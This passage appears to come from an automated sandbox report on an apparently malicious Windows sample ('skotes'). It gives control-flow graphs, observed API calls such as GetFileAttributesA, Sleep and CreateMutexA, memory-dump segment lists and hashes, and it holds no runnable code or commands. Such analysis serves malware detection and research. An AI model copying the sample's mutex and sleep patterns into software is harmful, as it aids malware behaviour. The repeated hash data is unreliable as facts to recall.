                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B51067190021AAFDB50EF65DCA19EE7BBFEF45310F60016DF510A3291EB709E458BA4

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1954 636fb4-636fe9 GetFileType 1955 6370a1-6370a4 1954->1955 1956 636fef-636ffa 1954->1956 1959 6370a6-6370a9 1955->1959 1960 6370cd-6370f5 1955->1960 1957 63701c-637038 call 6340f0 GetFileInformationByHandle 1956->1957 1958 636ffc-63700d call 63732a 1956->1958 1970 6370be-6370cb call 6375c0 1957->1970 1975 63703e-637080 call 63727c call 637124 * 3 1957->1975 1972 637013-63701a 1958->1972 1973 6370ba-6370bc 1958->1973 1959->1960 1965 6370ab-6370ad 1959->1965 1961 637112-637114 1960->1961 1962 6370f7-63710a 1960->1962 1967 637115-637123 call 61cff1 1961->1967 1962->1961 1977 63710c-63710f 1962->1977 1969 6370af-6370b4 call 6375f6 1965->1969 1965->1970 1969->1973 1970->1973 1972->1957 1973->1967 1990 637085-63709d call 637249 1975->1990 1977->1961 1990->1961 1993 63709f 1990->1993 1993->1973
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00636EE6), ref: 00636FD6
                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 00637030
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 006370C5
                                                                                                                                                                                              • Part of subcall function 0063732A: __dosmaperr.LIBCMT ref: 0063735F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                            • String ID: nc
                                                                                                                                                                                            • API String ID: 2531987475-3421823575
                                                                                                                                                                                            • Opcode ID: e7b370846b32fe9e6d0e566f51f5e678c228faef34413cd7142820bd97464b2e
                                                                                                                                                                                            • Instruction ID: b86501a5d715b5f8da16640ac7fb62ffdfcd26d85328efe732002e00436eb7fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: e7b370846b32fe9e6d0e566f51f5e678c228faef34413cd7142820bd97464b2e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D414FB6904204ABDB389FB5DC459ABB7FAEF49300F14451DF856D3211E730A944DBA1

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1994 609ba5-609bc5 GetFileAttributesA 1997 609bf3-609c0f 1994->1997 1998 609bc7-609bd3 1994->1998 2001 609c11-609c1d 1997->2001 2002 609c3d-609c5c 1997->2002 1999 609bd5-609be3 1998->1999 2000 609be9-609bf0 call 61d663 1998->2000 1999->2000 2005 60a91c 1999->2005 2000->1997 2007 609c33-609c3a call 61d663 2001->2007 2008 609c1f-609c2d 2001->2008 2003 609c8a-60a916 call 6180c0 2002->2003 2004 609c5e-609c6a 2002->2004 2009 609c80-609c87 call 61d663 2004->2009 2010 609c6c-609c7a 2004->2010 2012 60a953-60a987 Sleep CreateMutexA 2005->2012 2013 60a91c call 636c6a 2005->2013 2007->2002 2008->2005 2008->2007 2009->2003 2010->2005 2010->2009 2023 60a98e-60a994 2012->2023 2013->2012 2024 60a996-60a998 2023->2024 2025 60a9a7-60a9a8 2023->2025 2024->2025 2026 60a99a-60a9a5 2024->2026 2026->2025 2028 60a9a9-60a9b0 call 636629 2026->2028
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00609BA8
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 981c785eea34a4d5581f2b4fb2740bc6c28645278d88148621b4af9ea8545e4e
                                                                                                                                                                                            • Instruction ID: c88d6dbaade3aa7c19899d0718eab9ee378bb3e45ef6833c75d2e4520941a1fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 981c785eea34a4d5581f2b4fb2740bc6c28645278d88148621b4af9ea8545e4e
                                                                                                                                                                                            • Instruction Fuzzy Hash: A5310931B942449BEB0CDBBCDD897AFB6779B85310F248258E014973D6C7B549818761

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 2031 609cda-609cfa GetFileAttributesA 2034 609d28-609d44 2031->2034 2035 609cfc-609d08 2031->2035 2038 609d72-609d91 2034->2038 2039 609d46-609d52 2034->2039 2036 609d0a-609d18 2035->2036 2037 609d1e-609d25 call 61d663 2035->2037 2036->2037 2040 60a921 2036->2040 2037->2034 2044 609d93-609d9f 2038->2044 2045 609dbf-60a916 call 6180c0 2038->2045 2042 609d54-609d62 2039->2042 2043 609d68-609d6f call 61d663 2039->2043 2047 60a953-60a987 Sleep CreateMutexA 2040->2047 2048 60a921 call 636c6a 2040->2048 2042->2040 2042->2043 2043->2038 2051 609da1-609daf 2044->2051 2052 609db5-609dbc call 61d663 2044->2052 2060 60a98e-60a994 2047->2060 2048->2047 2051->2040 2051->2052 2052->2045 2061 60a996-60a998 2060->2061 2062 60a9a7-60a9a8 2060->2062 2061->2062 2063 60a99a-60a9a5 2061->2063 2063->2062 2065 60a9a9-60a9b0 call 636629 2063->2065
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00609CDD
                                                                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 396266464-3713388386
                                                                                                                                                                                            • Opcode ID: 0315a29fa8626763de78985dccab31fd2d8d35c1803fd67fdc111e46a3308c36
                                                                                                                                                                                            • Instruction ID: e6ac251518014c06aed05b22f6fd07ab92926800141402951cf0ca6e0d28c943
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0315a29fa8626763de78985dccab31fd2d8d35c1803fd67fdc111e46a3308c36
                                                                                                                                                                                            • Instruction Fuzzy Hash: 96311631B946449BEB1CDBACDC897AEB773DF86310F244658E014AB3D6C7758A808761

                                                                                                                                                                                            Control-flow Graph

